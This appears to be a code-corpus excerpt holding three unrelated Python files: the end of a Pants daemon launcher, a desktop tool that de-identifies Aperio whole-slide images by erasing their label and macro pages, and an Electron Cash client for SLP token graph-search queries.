:returns: A Handle for the pantsd instance.
:rtype: PantsDaemon.Handle
"""
self.terminate(include_watchman=False)
self.watchman_launcher.maybe_launch()
self._logger.debug('launching pantsd')
self.daemon_spawn()
# Wait up to 60 seconds for pantsd to write its pidfile.
pantsd_pid = self.await_pid(60)
listening_port = self.read_named_socket('pailgun', int)
self._logger.debug('pantsd is running at pid {}, pailgun port is {}'
.format(self.pid, listening_port))
return self.Handle(pantsd_pid, listening_port, self._metadata_base_dir)
def terminate(self, include_watchman=True):
"""Terminates pantsd and watchman.
N.B. This should always be called under care of the `lifecycle_lock`.
"""
super().terminate()
if include_watchman:
self.watchman_launcher.terminate()
def needs_restart(self, option_fingerprint):
"""
Overrides ProcessManager.needs_restart, to account for the case where pantsd is running
but we want to shutdown after this run.
:param option_fingerprint: A fingeprint of the global bootstrap options.
:return: True if the daemon needs to restart.
"""
should_shutdown_after_run = self._bootstrap_options.for_global_scope().shutdown_pantsd_after_run
return super().needs_restart(option_fingerprint) or \
(self.is_alive() and should_shutdown_after_run)
def launch():
"""An external entrypoint that spawns a new pantsd instance."""
PantsDaemon.Factory.create(OptionsBootstrapper.create()).run_sync()
|
wsideidentifier.py | #!/usr/bin/env python
# for mac: //instructions from https://opensource.com/article/19/5/python-3-default-mac
# //UNINSTALL HOMEBREW VERSIONS OF PYTHON FIRST!!
# $ brew install pyenv //manages python environments to avoid messy system environment
# $ pyenv install <version> //whatever version you want - 3.8.2 as of 3/27/2020
# $ pyenv global <version> //(optional) set version to be your default
# $ echo -e 'eval "$(pyenv init -)"' >> ~/.bash_profile //restart terminal to apply changes
# Run from within a virtual environment (venv) to allow defined versions of all external modules
# $ python3 -m venv venv //creates venv folder within current directory
# $ source venv/bin/activate //activates virtual environment
# - all dependencies can be installed without conflicts here
# - dependency list:
# -- pip install Eel==0.12.2
# -- pip install PyQt5==5.14.1
# -- pip install tinynumpy (needed for tiffparser)
# -- pip install pyinstaller (to create application package)
# To install all dependencies at once:
# $ pip install Eel==0.12.2 PyQt5==5.14.1 tinynumpy pyinstaller
# os: for opening files
import os
# shutil: for copying files
import shutil
# struct: to pack/unpack data while writing binary files
import struct
# re: for regular expression parsing of file paths
import re
# copy: copy object rather than creating a reference
import copy
#threading.Thread: for async file copying
import threading
from threading import Thread
#csv: for reading csv file with filenames/destinations
import csv
#sys, platform: for checking which operating system is in use
import sys
import platform
# REQUIRED EXTERNAL LIBRARIES
# eel: for the html/css/javascript GUI
# $ pip install Eel==0.12.2
import eel
# tiffparser: stripped down version of tifffile
# located in root project folder alongside this file.
# removes need for numpy, which reduces application size significantly
# requires tinynumpy instead
# $ pip install tinynumpy
import tiffparser
# Parse Markdown to create options interface
import commonmark
from bottle import route
# pyqt5: python binding to Qt GUI framework, needed for file/directory picker dialog
# $ pip install PyQt5==5.14.1
# also requires qt5 to be installed
# - $ brew install qt5
from PyQt5.QtWidgets import QApplication, QFileDialog, QLabel, QMainWindow
from PyQt5.QtCore import QObject, pyqtSignal, QThread, QDir #, Qt
#useChrome = True # TODO: set this by commandline option
### ---- COMMENT ME OUT TO USE CHROME MODE - UNCOMMENT FOR QT MODE ---- ###
# from PyQt5.QtWebEngineWidgets import QWebEnginePage, QWebEngineView
# from PyQt5.QtCore import QUrl
# useChrome = False
# class EelThread(QThread):
# def __init__(self, parent = None, init='web',url='main.html'):
# QThread.__init__(self, parent)
# self.init = init
# self.url = url
# def run(self):
# # Note: This is never called directly. It is called by Qt once the
# # thread environment has been set up.
# eel.init(self.init)
# eel.start(self.url, block=True, mode=None)
### ---- END OF COMMENT ME OUT TO USE CHROME MODE - UNCOMMENT FOR QT MODE ---- ###
class ThreadsafeCaller(QObject):
get_signal = pyqtSignal(QObject,dict)
# set_signal = pyqtSignal(dict)
def __init__(self):
super(ThreadsafeCaller, self).__init__()
self.threadid=int(QThread.currentThreadId())
self.multithreading=False
self.returnvalue=None # read-only from self; written by other
self.waiting=False # read-only from self; written by other; atomic
def _make(self):
other = ThreadsafeCaller()
# if constructed from a different thread, use signal-slot to make threadsafe
if self.threadid != other.threadid:
other.multithreading=True
other.get_signal.connect(self._call)
return other
def _call(self,other,d):
# unpack and call the function; package returned value into dict to send by signal
output={'result': d['f'](*d['args'], **d['kwargs'])}
other.returnvalue=output
other.waiting=False
return output
def _wait(self):
while self.waiting==True:
QThread.msleep(20)
def _callother(self,func,*args,**kwargs):
# package arguments into dict to send via signal
d={'f':func,'args':args,'kwargs':kwargs}
if self.multithreading:
self.waiting=True # set flag before triggering signal-slot
self.get_signal.emit(self,d)
self._wait()
return self.returnvalue['result'] #unpack result from dict
else:
return self._call(self,d)['result'] #unpack result from dict
def call(self,func,*args,**kwargs):
other=self._make()
return other._callother(func,*args,**kwargs)
# source: https://stackoverflow.com/a/44352931/1214731
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))
return os.path.join(base_path, relative_path)
@route('/settings')
def settings():
with open(resource_path('.')+'/settings.md','r') as fp:
return commonmark.commonmark(fp.read())
@route('/readme')
def readme():
with open(resource_path('.')+'/README.md','r') as fp, open(resource_path('.')+'/help.md','r') as hp:
d = {
'readme':commonmark.commonmark(fp.read()),
'help':commonmark.commonmark(hp.read())
}
return d
# Read/modify TIFF files (as in the SVS files) using tiffparser library (stripped down tifffile lib)
# delete_associated_image will remove a label or macro image from an SVS file
def delete_associated_image(slide_path, image_type):
# THIS WILL ONLY WORK FOR STRIPED IMAGES CURRENTLY, NOT TILED
allowed_image_types=['label','macro'];
if image_type not in allowed_image_types:
raise Exception('Invalid image type requested for deletion')
fp = open(slide_path, 'r+b')
t = tiffparser.TiffFile(fp)
# logic here will depend on file type. AT2 and older SVS files have "label" and "macro"
# strings in the page descriptions, which identifies the relevant pages to modify.
# in contrast, the GT450 scanner creates svs files which do not have this, but the label
# and macro images are always the last two pages and are striped, not tiled.
# The header of the first page will contain a description that indicates which file type it is
first_page=t.pages[0]
filtered_pages=[]
if 'Aperio Image Library' in first_page.description:
filtered_pages = [page for page in t.pages if image_type in page.description]
elif 'Aperio Leica Biosystems GT450' in first_page.description:
if image_type=='label':
filtered_pages=[t.pages[-2]]
else:
filtered_pages=[t.pages[-1]]
else:
# default to old-style labeled pages
filtered_pages = [page for page in t.pages if image_type in page.description]
num_results = len(filtered_pages)
if num_results > 1:
raise Exception(f'Invalid SVS format: duplicate associated {image_type} images found')
if num_results == 0:
#No image of this type in the WSI file; no need to delete it
return
# At this point, exactly 1 image has been identified to remove
page = filtered_pages[0]
# get the list of IFDs for the various pages
offsetformat = t.tiff.ifdoffsetformat
offsetsize = t.tiff.ifdoffsetsize
tagnoformat = t.tiff.tagnoformat
tagnosize = t.tiff.tagnosize
tagsize = t.tiff.tagsize
unpack = struct.unpack
# start by saving this page's IFD offset
ifds = [{'this': p.offset} for p in t.pages]
# now add the next page's location and offset to that pointer
for p in ifds:
# move to the start of this page
fp.seek(p['this'])
# read the number of tags in this page
(num_tags,) = unpack(tagnoformat, fp.read(tagnosize))
# move forward past the tag defintions
fp.seek(num_tags*tagsize, 1)
# add the current location as the offset to the IFD of the next page
p['next_ifd_offset'] = fp.tell()
# read and save the value of the offset to the next page
(p['next_ifd_value'],) = unpack(offsetformat, fp.read(offsetsize))
# filter out the entry corresponding to the desired page to remove
pageifd = [i for i in ifds if i['this'] == page.offset][0]
# find the page pointing to this one in the IFD list
previfd = [i for i in ifds if i['next_ifd_value'] == page.offset]
# check for errors
if(len(previfd) == 0):
raise Exception('No page points to this one')
return
else:
previfd = previfd[0]
# get the strip offsets and byte counts
offsets = page.tags['StripOffsets'].value
bytecounts = page.tags['StripByteCounts'].value
# iterate over the strips and erase the data
# print('Deleting pixel data from image strips')
for (o, b) in zip(offsets, bytecounts):
fp.seek(o)
fp.write(b'\0'*b)
# iterate over all tags and erase values if necessary
# print('Deleting tag values')
for key, tag in page.tags.items():
fp.seek(tag.valueoffset)
fp.write(b'\0'*tag.count)
offsetsize = t.tiff.ifdoffsetsize
offsetformat = t.tiff.ifdoffsetformat
pagebytes = (pageifd['next_ifd_offset']-pageifd['this'])+offsetsize
# next, zero out the data in this page's header
# print('Deleting page header')
fp.seek(pageifd['this'])
fp.write(b'\0'*pagebytes)
# finally, point the previous page's IFD to this one's IFD instead
# this will make it not show up the next time the file is opened
fp.seek(previfd['next_ifd_offset'])
fp.write(struct.pack(offsetformat, pageifd['next_ifd_value']))
fp.close()
def get_csv_message():
return 'CSV files must contain exactly two columns named "source" and "destination" in order to be processed.'
def parse_csv(file, filelist, invalid):
try:
with open(file, newline='') as csvfile:
reader = csv.DictReader(csvfile, delimiter=',', quotechar='"')
fields = ['source','destination']
header=[h.strip().lower() for h in reader.fieldnames]
if len(header)!=2 or any([h not in fields for h in header]):
raise ValueError(get_csv_message())
fieldmap={f: list(filter(lambda l: l.strip().lower()==f, reader.fieldnames))[0] for f in fields }
for row in reader:
src=row[fieldmap['source']]
dest=row[fieldmap['destination']]
file_format=detect_format(src)
if file_format=='Aperio':
filelist.append({
'file':src,
'format':file_format,
'destination':dest
})
else:
invalid.append({'file':src}) #not a valid Aperio file
except ValueError as e:
# Add this file to the list of invalid files (it wasn't a valid CSV file)
invalid.append({'file':file})
finally:
return
def detect_format(filename):
retval = None
# print('Detecting format for ',filename)
try:
with open(filename, 'rb') as fp:
t = tiffparser.TiffFile(fp)
description = t.pages[0].description
# print('Description for ',filename,': ',description.replace('|','\n'))
if description.startswith('Aperio'):
retval = 'Aperio'
except Exception as e:
print('Exception in detect_format:',e)
finally:
return retval
def add_description(f):
# print(f'Adding image description to {f}\n')
try:
f['filesize'] = os.stat(f['file']).st_size
with open(f['file'], 'rb') as fp:
t = tiffparser.TiffFile(fp)
desc=re.split(';|\||\r\n?',t.pages[0].description)
a={}
for idx, item in enumerate(desc):
if item.startswith('Aperio'):
a[item.strip()] = desc[idx+1]
elif re.match('^[A-Za-z\s]+\s=',item):
parts=item.split(' = ')
a[parts[0]]=parts[1]
f['description'] = a
except Exception as e:
print('Exception in add_description:', e)
finally:
return f
def get_filename(f):
return f.split(QDir.fromNativeSeparators(os.path.sep))[-1]
def parse_files(files):
fileinfo = [{'file': f, 'format': detect_format(f), 'destination': get_filename(f)} for f in files]
# print('File info:',fileinfo)
aperio=[f for f in fileinfo if f['format']=='Aperio']
invalid=[]
others = [parse_csv(f['file'], aperio, invalid) for f in fileinfo if f['format'] != 'Aperio']
filelist = {'aperio':[add_description(f) for f in aperio],'invalid':invalid}
# print('File list:', filelist)
return filelist
def inplace_info(f):
with open(f['file'],'r+b') as fp:
f['writable']=fp.writable()
t = tiffparser.TiffFile(fp)
label = [page for page in t.pages if 'label' in page.description]
macro = [page for page in t.pages if 'macro' in page.description]
f['has_label']=len(label)>0
f['has_macro']=len(macro)>0
eel.add_inplace_file(f)
def get_inplace_info(fs):
[inplace_info(f) for f in fs['aperio']]
def parse_inplace_files(files):
fs=parse_files(files);
threading.Thread(target=get_inplace_info, args=[fs]).start()# do this in a separate thread so the app stays responsive
# [inplace_info(f) for f in fs['aperio']]
# [print(f'{f}----\n') for f in fs['aperio']]
# filelist={'aperio':[f for f in fs['aperio'] if f['writable']==True],
# 'readonly':[f for f in fs['aperio'] if f['writable']==False],
# 'invalid':fs['invalid']}
# output = {'aperio':} // check if aperio files are writable here and add that to the output
return fs
# File Dialog methods
# use Filebrowser objects for thread safety via signal-slot mechanisms
# filedialog = Filebrowser()
tsc = ThreadsafeCaller()
@eel.expose
def get_files(dlgtype='native',path=''):
# c = tsc.make()
# print(f'get_files requested in {int(QThread.currentThreadId())}')
result=tsc.call(get_files_, dlgtype=dlgtype, path=path)
if result['absolutePath']!=False:
eel.set_follow_source(result['absolutePath'])
return parse_files(result['files'])
@eel.expose
def get_dir(dlgtype='native',path=''):
# c = tsc.make()
# print(f'get_dir requested in {int(QThread.currentThreadId())}')
result=tsc.call(get_dir_, dlgtype=dlgtype, path=path)
if result['absolutePath']!=False:
eel.set_follow_dest(result['absolutePath'])
if result['directory'] != '':
total, used, free = shutil.disk_usage(result['directory'])
result['total']=total
result['free']=free
result['writable']=os.access(result['directory'], os.W_OK)
return result
@eel.expose
def get_inplace_files(dlgtype='native',path=''):
# c = tsc.make()
# print(f'get_files requested in {int(QThread.currentThreadId())}')
result=tsc.call(get_files_, dlgtype=dlgtype, path=path)
if result['absolutePath']!=False:
eel.set_follow_source(result['absolutePath'])
return parse_inplace_files(result['files'])
@eel.expose
def get_inplace_dir(dlgtype='native',path=''):
# c = tsc.make()
# print(f'get_dir requested in {int(QThread.currentThreadId())}')
result=tsc.call(get_dir_, dlgtype=dlgtype, path=path)
if result['absolutePath']!=False:
eel.set_follow_dest(result['absolutePath'])
print('directory chosen:',result['directory'])
files = [os.path.join(dp, f).replace('\\','/') for dp, dn, filenames in os.walk(result['directory'])
for f in filenames if os.path.splitext(f)[1].lower() == '.svs']
# if result['directory'] != '':
# total, used, free = shutil.disk_usage(result['directory'])
# result['total']=total
# result['free']=free
# result['writable']=os.access(result['directory'], os.W_OK)
return parse_inplace_files(files)
@eel.expose
def test_file_dialog(dlgtype,path=''):
return tsc.call(get_files_, dlgtype=dlgtype, path=path)
@eel.expose
def get_config_path(dlgtype='native',path=''):
return tsc.call(get_dir_, dlgtype, path=path)
def get_files_(dlgtype='native', path=''):
if path is None:
path=''
# print(f'get_files processed in {int(QThread.currentThreadId())}')
dialog = QFileDialog(None)
dialog.setFileMode(QFileDialog.ExistingFiles)
dialog.setViewMode(QFileDialog.Detail)
if dlgtype=='qt': # default to native unless qt is explicitly requested
dialog.setOption(QFileDialog.DontUseNativeDialog, True)
dialog.setNameFilters(['Aperio SVS or CSV (*.svs *.csv)'])
if len(path)>0 and QDir(path).exists():
dialog.setDirectory(path)
files = []
absolutepath=False
if dialog.exec() == QFileDialog.Accepted:
dlg_out = dialog.selectedFiles()
files = dlg_out
absolutepath=dialog.directory().absolutePath()
output = {
'files':files,
'absolutePath':absolutepath
}
return output
def get_dir_(dlgtype='native', path='path'):
if path is None:
path=''
# print(f'get_dir processed in {int(QThread.currentThreadId())}')
dialog = QFileDialog(None)
dialog.setFileMode(QFileDialog.Directory)
dialog.setOption(QFileDialog.ShowDirsOnly, True)
if dlgtype=='qt': # default to native unless qt is explicitly requested
dialog.setOption(QFileDialog.DontUseNativeDialog, True)
dialog.setViewMode(QFileDialog.Detail)
if len(path)>0 and QDir(path).exists():
dialog.setDirectory(path)
directory = ''
absolutepath=False
if dialog.exec() == QFileDialog.Accepted:
dlg_out = dialog.selectedFiles()
directory = dlg_out[0]
absolutepath=dialog.directory().absolutePath()
output = {
'directory':directory,
'absolutePath':absolutepath,
}
return output
@eel.expose
def do_copy_and_strip(files):
copyop = CopyOp([{'source':f['source'],
'dest':None,
'id':f['id'],
'filesize':os.stat(f['source']).st_size,
'done':False,
'renamed':False,
'failed':False,
'failure_message':''} for f in files])
threading.Thread(target=track_copy_progress, args=[copyop]).start()
threading.Thread(target=copy_and_strip_all, args=[files, copyop]).start()
# for index, f in enumerate(files):
# threading.Thread(target=copy_and_strip, args=[f, copyop, index]).start()
return 'OK'
@eel.expose
def do_strip_in_place(file):
try:
print(f'Deidentifying {file}...')
delete_associated_image(file,'label')
delete_associated_image(file,'macro')
print ("Stripped", file)
except Exception as e:
print(f'Exception deidentifying {file}: {e}')
return 'There was a problem deleting associated images from this file'
return 'ok'
@eel.expose
def check_free_space(directory):
total, used, free = shutil.disk_usage(directory)
return free
# Threading-related methods
# CopyOp: thread-safe file info to share data between copy and progress threads
class CopyOp(object):
def __init__(self, start = []):
self.lock = threading.Lock()
self.value = start
self.original = start
def update(self, index, val):
self.lock.acquire()
try:
for key, value in val.items():
self.value[index][key]=value
finally:
self.lock.release()
def read(self):
self.lock.acquire()
cp = copy.deepcopy(self.value)
self.lock.release()
return cp
def file_progress(b):
progress = 0 # default value
dest_set = b['dest']!=None
# check both of these to make sure the new file has been created before trying to query current size
if dest_set and os.path.isfile(b['dest']):
progress = os.stat(b['dest']).st_size
return progress
# def track_copy_progress: update the GUI with progress of copy operations
def track_copy_progress(copyop):
# Start with the original file structure, in case it has already updated by the time this thread executes
o = copyop.original
while(any([f['done']==False for f in o])):
try:
n=copyop.read()
d=[{'id':b['id'],'dest':b['dest'],'renamed':b['renamed']}
for a, b in zip(o,n) if a['dest']!=b['dest'] ]
p=[{'id':b['id'],'progress':file_progress(b)} for b in n if b['done']==False ]
f = [b for a,b in zip(o,n) if a['done']!=b['done'] ]
#send updates to javascript/GUI
eel.update_progress({'destinations':d,'progress':p,'finalized':f})
#copy new values to old to track what needs updating still
o = n
except Exception as e:
print('Exception in track_copy_progress:',e)
#rate limit this progress reporting
eel.sleep(0.03)
# ii+=1
print('Finished tracking progress')
# copy_and_strip_all: iterate over all files and copy and remove labels
def copy_and_strip_all(files,copyop):
[copy_and_strip(file,copyop,index) for index,file in enumerate(files)]
# copy_and_strip: single file copy/deidentify operation.
# to be done in a thread for concurrent I/O using CopyOp object for progress updates
def copy_and_strip(file, copyop, index):
# clean the paths of improper file separators for the OS
oldname=os.path.sep.join(re.split('[\\\/]', file['source']))
newname=os.path.sep.join(re.split('[\\\/]', file['dest']))
# remove the filename leaving just the path
dest_path = os.path.sep.join(newname.split(os.path.sep)[:-1])
try:
# create the destination directory if necessary
os.makedirs(dest_path, exist_ok=True)
filename, file_extension = os.path.splitext(newname)
# if filename.endswith('failme'):
# raise ValueError('Cannot copy this file')
# now the directory exists; check if the file already exists
if not os.path.exists(newname): # folder exists, file does not
copyop.update(index, {'dest':newname})
shutil.copyfile(oldname, newname)
else: # folder exists, file exists as well
ii = 1
# filename, file_extension = os.path.splitext(newname)
while True:
test_newname = f'{filename}({str(ii)}){file_extension}'
if not os.path.exists(test_newname):
newname = test_newname
copyop.update(index, {'dest':newname, 'renamed':True})
shutil.copyfile(oldname, newname)
break
ii += 1
print('Deidentifying...')
delete_associated_image(newname,'label')
delete_associated_image(newname,'macro')
print ("Copied", oldname, "as", newname)
except Exception as e:
try:
os.remove(newname)
except FileNotFoundError:
pass
finally:
copyop.update(index, {'failed':True,'failure_message':f'{e}'})
print(f"Deidentification of {oldname} -> {newname} failed; removed copy of WSI file.\nException: {e}\n")
finally:
copyop.update(index, {'done':True})
return
|
slp_graph_search.py | """
SLP Graph Search Client
Performs a background search and batch download of graph
transactions from a Graph Search server. For more information about
a Graph Search server see:
* gs++: https://github.com/blockparty-sh/cpp_slp_graph_search
* bchd: https://github.com/simpleledgerinc/bchd/tree/graphsearch
This class is currently only used by slp_validator_0x01.py.
The NFT1 validator has not yet been attached to the NFT1 validator.
Servers can be added or removed using "lib/servers_slpdb.json" and
"lib/servers_slpdb_testnet.json". Currently only the bchd has been tested
with the validation cache excludes.
"""
import sys
import time
import threading
import queue
import traceback
import weakref
import collections
import json
import base64
import requests
import codecs
import random
from operator import itemgetter
from .transaction import Transaction
from .caches import ExpiringCache
from electroncash import networks
from . import slp_validator_0x01
class _GraphSearchJob:
def __init__(self, valjob):
self.root_txid = valjob.root_txid
self.valjob = valjob
# metadata fetched from back end
self.depth_map = None
self.total_depth = None
self.txn_count_total = None
self.validity_cache_size = 0
# job status info
self.search_started = False
self.search_success = None
self.job_complete = False
self.exit_msg = ''
self.depth_current_query = None
self.txn_count_progress = 0
self.gs_response_size = 0
self.last_search_url = '(url empty)'
# ctl
self.waiting_to_cancel = False
self.cancel_callback = None
# gs job results cache - clears data after 30 minutes
self._txdata = ExpiringCache(maxlen=10000000, name="GraphSearchTxnFetchCache", timeout=1800)
def sched_cancel(self, callback=None, reason='job canceled'):
self.exit_msg = reason
if self.job_complete:
return
if not self.waiting_to_cancel:
self.waiting_to_cancel = True
self.cancel_callback = callback
def set_success(self):
self.search_success = True
self.job_complete = True
def set_failed(self, reason=None):
self.search_started = True
self.search_success = False
self.job_complete = True
self.exit_msg = reason
def get_tx(self, txid: str) -> object:
''' Attempts to retrieve txid from the tx cache that this class
keeps in-memory. Returns None on failure. The returned tx is
not deserialized, and is a copy of the one in the cache. '''
tx = self._txdata.get(txid)
if tx is not None and tx.raw:
# make sure to return a copy of the transaction from the cache
# so that if caller does .deserialize(), *his* instance will
# use up 10x memory consumption, and not the cached instance which
# should just be an undeserialized raw tx.
return Transaction(tx.raw)
return None
def put_tx(self, tx: bytes, txid: str = None):
''' Puts a non-deserialized copy of tx into the tx_cache. '''
txid = txid or Transaction._txid(tx.raw) # optionally, caller can pass-in txid to save CPU time for hashing
self._txdata.put(txid, tx)
def get_job_cache(self, *, max_size=-1, is_mint=False):
''' Get validity cache for a token graph
reverse reverses the endianess of the txid
max_size=-1 returns a cache with no size limit
is_mint is used to further limit which txids are included in the cache
for mint transactions, since other mint transactions are the only
validation contributors
'''
if max_size == 0:
return []
wallet = self.valjob.ref()
if not wallet:
return []
token_id = self.valjob.graph.validator.token_id_hex
gs_cache = []
# get valid txid cache from the graph
gs_cache = self.valjob.graph.get_valid_txids(max_size=max_size, exclude=gs_cache)
# pull valid txids from wallet storage
sample_size = 0
if max_size > 0 and len(gs_cache) < max_size:
sample_size = max_size - len(gs_cache)
if sample_size > 0:
wallet_val = self.valjob.validitycache.copy()
wallet_tok_info = wallet.tx_tokinfo.copy()
for txid, val in wallet_val.items():
_token_id = wallet_tok_info.get(txid, {}).get("token_id", None)
if _token_id == token_id and val == 1:
sample_size -= 1
if sample_size < 0:
break
gs_cache.append(txid)
# if required limit the size of the cache
gs_cache = list(set(gs_cache))
if gs_cache and max_size > 0 and len(gs_cache) > max_size:
gs_cache = list(set(random.choices(gs_cache, k=max_size)))
# update the cache size variable used in the UI
self.validity_cache_size = len(gs_cache)
return gs_cache
def _cancel(self):
self.job_complete = True
self.search_success = False
if self.cancel_callback:
self.cancel_callback(self)
class _SlpGraphSearchManager:
"""
A single thread that processes graph search requests sequentially.
"""
def __init__(self, threadname="GraphSearch"):
# holds the job history and status
self._search_jobs = dict()
self._gui_object = None
self.lock = threading.Lock()
# Create a single use queue on a new thread
self.search_queue = queue.Queue() # TODO: make this a PriorityQueue based on dag size
self.threadname = threadname
self.search_thread = threading.Thread(target=self.mainloop, name=self.threadname+'/search', daemon=True)
self.search_thread.start()
self.bytes_downloaded = 0 # this is the total number of bytes downloaded by graph search
def bind_gui(self, gui):
self._gui_object = gui
@property
def slp_validity_signal(self):
if not self._gui_object: return
return self._gui_object().slp_validity_signal
@property
def slp_validation_fetch_signal(self):
if not self._gui_object: return
return self._gui_object().slp_validation_fetch_signal
@property
def gs_enabled(self):
return self._gui_object and self._gui_object().config.get('slp_validator_graphsearch_enabled', False)
def _set_gs_enabled(self, enable):
self._gui_object().config.set_key('slp_validator_graphsearch_enabled', enable)
@property
def gs_host(self):
host = self._gui_object().config.get('slp_validator_graphsearch_host', '')
# handle case for upgraded config key name
if not host:
host = self._gui_object().config.get('slp_gs_host', '')
if not host: self.set_gs_host(host)
return host
def set_gs_host(self, host):
self._gui_object().config.set_key('slp_validator_graphsearch_host', host)
# def _emit_ui_update(self, data):
# if not self.slp_validation_fetch_signal:
# return
# self.slp_validation_fetch_signal.emit(data)
def get_gs_job(self, valjob):
"""
Returns the GS job object, if new job is created it is added to the gs queue.
"""
txid = valjob.root_txid
with self.lock:
if txid not in self._search_jobs.keys():
job = _GraphSearchJob(valjob)
self._search_jobs[txid] = job
self.search_queue.put(job)
return self._search_jobs[txid]
def toggle_graph_search(self, enable):
"""
Used by the UI to enable/disable graph search
Since its called only by the UI no locks are being held.
"""
if self.gs_enabled == enable:
return
# get a weakref to each open wallet
wallets = weakref.WeakSet()
jobs_copy = self._search_jobs.copy()
for job_id in jobs_copy:
job = jobs_copy[job_id]
job.valjob.stop()
if job.valjob.ref and job.valjob.ref():
wallets.add(job.valjob.ref())
# kill the current validator activity
slp_validator_0x01.shared_context.kill()
# delete all the gs jobs
self._search_jobs.clear()
self._set_gs_enabled(enable)
# activate slp in each wallet
for wallet in wallets:
if wallet: wallet.activate_slp()
def find(self, root_txid):
return self._search_jobs.get(root_txid, None)
def jobs_copy(self):
with self.lock:
return self._search_jobs.copy()
def restart_search(self, job):
def callback(job):
self.get_gs_job(job.valjob)
job = None
if not job.job_complete:
job.sched_cancel(callback, reason='job restarted')
else:
callback(job)
def mainloop(self,):
while True:
job = self.search_queue.get(block=True)
if not self.gs_enabled:
job.set_failed('gs is disabled')
continue
job.search_started = True
if not job.valjob.running and not job.valjob.has_never_run:
job.set_failed('validation finished')
continue
try:
# search_query is a network call, most time will be spent here
self.search_query(job)
except Exception as e:
print("error in graph search query", e, file=sys.stderr)
job.set_failed(str(e))
finally:
job.valjob.wakeup.set()
#self._emit_ui_update(self.bytes_downloaded)
def search_query(self, job):
if job.waiting_to_cancel:
job._cancel()
return
if not job.valjob.running and not job.valjob.has_never_run:
job.set_failed('validation finished')
return
print('GS Request: {} ({})'.format(job.root_txid, self.gs_host))
txid = codecs.encode(codecs.decode(job.root_txid,'hex')[::-1], 'hex').decode()
print('GS Request: {} (reversed) ({})'.format(txid, self.gs_host))
# setup post url/query based on gs server kind
kind = 'bchd'
host = slp_gs_mgr.gs_host
cache = []
if networks.net.SLPDB_SERVERS.get(host):
kind = networks.net.SLPDB_SERVERS.get(host)["kind"]
if kind == 'gs++':
url = host + "/v1/graphsearch/graphsearch"
query_json = { "txid": txid } # TODO: handle 'validity_cache' exclusion from graph search (NOTE: this will impact total dl count)
res_txns_key = 'txdata'
elif kind == 'bchd':
root_hash_b64 = base64.standard_b64encode(codecs.decode(job.root_txid,'hex')[::-1]).decode("ascii")
url = host + "/v1/GetSlpGraphSearch"
cache = job.get_job_cache(max_size=1000)
# bchd needs the reverse txid and then use base64 encoding
tx_hashes = []
for txid_hex in cache:
txid = codecs.decode(txid_hex, 'hex')
tx_hash = txid[::-1]
tx_hash = base64.standard_b64encode(tx_hash).decode("ascii")
tx_hashes.append(tx_hash)
query_json = { "hash": root_hash_b64, "valid_hashes": tx_hashes }
res_txns_key = 'txdata'
else:
raise Exception("unknown server kind")
dat = b''
time_last_updated = time.perf_counter()
headers = {'Content-Type': 'application/json', 'Accept':'application/json'}
with requests.post(url, data=json.dumps(query_json), headers=headers, stream=True, timeout=60) as r:
for chunk in r.iter_content(chunk_size=None):
job.gs_response_size += len(chunk)
self.bytes_downloaded += len(chunk)
dat += chunk
# t = time.perf_counter()
# if (t - time_last_updated) > 5:
# self._emit_ui_update(self.bytes_downloaded)
# time_last_updated = t
if not job.valjob.running:
job.set_failed('validation job stopped')
return
# FIXME: for some reason weakref to wallet still exists after closing (o_O)
# if not job.valjob.ref():
# job.set_failed('wallet file closed')
# return
elif job.waiting_to_cancel:
job._cancel()
return
elif not self.gs_enabled:
return
try:
dat = json.loads(dat.decode('utf-8'))
txns = dat[res_txns_key]
except json.decoder.JSONDecodeError:
msg = '=> %s'%dat.decode('utf-8')
if len(dat.decode('utf-8')) > 100:
msg = 'message is too long'
raise Exception('server returned invalid json (%s)'%msg)
except KeyError:
if dat.get('message', None):
msg = dat['message']
if 'txid is missing from slp validity set' in msg:
raise Exception('likely invalid slp')
raise Exception(dat)
# NOTE: THE FOLLOWING IS FOR DEBUG PURPOSES TO CHECK
# THE GRAPH SEARCH RESULTS AGAINST ANOTHER VALIDATOR
# USING THE SAME TX DATA AND TXID CACHE.
#
# # save txdata and cache to file for debugging
# try:
# with open('%s-txdata.json'%job.root_txid, 'x') as json_file:
# json.dump(dat, json_file)
# with open('%s-cache.json'%job.root_txid, 'x') as json_file:
# json.dump({'cache': cache }, json_file)
# except: pass
for txn in txns:
job.txn_count_progress += 1
tx = Transaction(base64.b64decode(txn).hex())
job.put_tx(tx)
job.set_success()
print("[SLP Graph Search] job success.")
slp_gs_mgr = _SlpGraphSearchManager()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.